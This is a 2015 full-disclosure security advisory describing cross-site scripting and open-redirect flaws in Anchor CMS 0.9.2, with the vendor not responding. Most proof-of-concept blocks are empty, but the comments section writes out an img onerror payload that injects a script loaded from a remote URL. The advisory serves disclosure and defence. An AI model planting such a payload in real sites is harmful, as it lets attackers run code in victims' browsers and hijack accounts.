Anchor CMS 0.9.2: XSS
Date: 2015-09-14 10:57:071. Introduction
Affected Product: | Anchor CMS 0.9.2 |
Fixed in: | not fixed |
Fixed Version Link: | n/a |
Vendor Contact: | Website: http://anchorcms.com/ |
Vulnerability Type: | XSS and Open Redirect |
Remote Exploitable: | Yes |
Reported to vendor: | 07/30/2015 |
Disclosed to public: | 09/14/2015 |
Release mode: | Full Disclosure |
CVE: | n/a |
Credits | Tim Coen of curesec GmbH |
2. Vulnerability Description
Various components of Anchor CMS are vulnerable to cross site scripting. With this, it is possible to inject and execute arbitrary JavaScript code. This can for example be used by an attacker to inject a JavaScript keylogger, bypass CSRF protection, or perform phishing attacks.
The attacks can be exploited by getting the victim to click a link or visit an attacker controlled website.
XSS 1
The 404 error page of Anchor CMS outputs the URL that was visited. It uses REQUEST_URI to do this, which can generally be considered reasonably secure as most modern browsers URL encode it. However, it then decodes it, opening it up for XSS.
Sample POC:
Code:
XSS / Open Redirect
The default theme of Anchor CMS echoes the given URL inside HTML tags. less-than and greater-than are properly encoded to protect against XSS, but quotes are not encoded as ENT_NOQUOTES is used. This makes it possible to break out of the context of the given attribute and add further attributes.
The improper encoding of the URL leads to an Open Redirect vulnerability which may aid in phishing attacks. Additionally, it may lead to XSS in older browsers.
Sample POC:
Code:
XSS (User)
It can be considered dangerous to let normal users post scripts, as this leads to persistent XSS, which can easily bypass CSRF protection, and thus a user could for example elevate their priviledge level to admin.
XSS (Comments)
Once comments are approved, they are not encoded anymore. It might be easy for an attacker to hide for example <img src="img" onerror="s=document.createElement('script');s.src='http://localhost/s.js';document.getElementById('tray').appendChild(s)"> from an inexperienced user inside a large comment with lots of HTML. This would load a remote script, in which an attacker can perform the actual attack.
3. Solution
This issue was not fixed by the vendor.
4. Report Timeline
07/21/2015 | Informed Vendor about Issue (no reply) |
08/18/2015 | Reminded Vendor of release date (no reply) |
09/14/2015 | Disclosed to public |